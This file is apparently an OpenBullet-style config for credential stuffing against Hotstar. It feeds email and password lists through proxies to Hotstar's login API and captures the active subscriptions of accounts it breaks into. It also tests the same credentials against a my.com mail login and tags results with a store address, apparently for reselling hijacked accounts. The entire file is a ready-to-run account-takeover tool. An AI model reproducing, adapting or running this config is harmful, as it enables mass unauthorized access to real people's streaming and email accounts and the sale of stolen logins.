[SETTINGS]
{
  "Name": "HotStar",
  "SuggestedBots": 20,
  "MaxCPM": 0,
  "LastModified": "2019-07-08T12:21:05.8381038+04:30",
  "AdditionalInfo": "",
  "Author": "TakTir & DaniCGI",
  "Version": "1.2.6.5 [Paradox Mod]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://api.hotstar.com/in/aadhar/v2/web/in/user/login" 
  CONTENT "{\"isProfileRequired\":false,\"userData\":{\"deviceId\":\"90c6a116-fad5-408e-a149-dc5d619d7a8b\",\"pId\":\"88eb526748d34ceb896e59e52928169b\",\"password\":\"<PASS>\",\"username\":\"<USER>\",\"usertype\":\"email\"},\"verification\":{}}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Login Success\",\"" 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "{\"description\":{\"" 

PARSE "<SOURCE>" JSON "userIdentity" -> VAR "TOKEN" 

REQUEST GET "https://api.hotstar.com/in/gringotts/v2/web/in/payment/history" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 
  HEADER "userId: <TOKEN>" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "\":{\"activeSubs\":[],\"" 

PARSE "<SOURCE>" LR "activeSubs\":[" "]," -> CAP "Active Sub" 

REQUEST GET "https://aj-https.my.com/cgi-bin/auth?timezone=GMT%2B2&reqmode=fg&ajax_call=1&udid=16cbef29939532331560e4eafea6b95790a743e9&device_type=Tablet&mp=iOS¤t=MyCom&mmp=mail&os=iOS&md5_signature=6ae1accb78a8b268728443cba650708e&os_version=9.2&model=iPad%202%3B%28WiFi%29&simple=1&Login=<USER>&ver=4.2.0.12436&DeviceID=D3E34155-21B4-49C6-ABCD-FD48BB02560D&country=GB&language=fr_FR&LoginType=Direct&Lang=fr_FR&Password=<PASS>&device_vendor=Apple&mob_json=1&DeviceInfo=%7B%22Timezone%22%3A%22GMT%2B2%22%2C%22OS%22%3A%22iOS%209.2%22%2C?%22AppVersion%22%3A%224.2.0.12436%22%2C%22DeviceName%22%3A%22iPad%22%2C%22Device?%22%3A%22Apple%20iPad%202%3B%28WiFi%29%22%7D&device_name=iPad&" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "UserAgent: MyCom/12436 CFNetwork/758.2.8 Darwin/15.0.0" 
  HEADER "ContentType: application/x-www-form-urlencoded" 
PARSE "<SOURCE>" LR "[\"AjaxResponse\", \"OK\", \"" "\"]" -> VAR "ACCESS" "" " | uniquevintage.selly.store" 
FUNCTION Replace "Ok=0" "False" "<ACCESS>" -> CAP "Email Access" 
FUNCTION Replace "Ok=1" "True" "<ACCESS>" -> CAP "Email Access" 

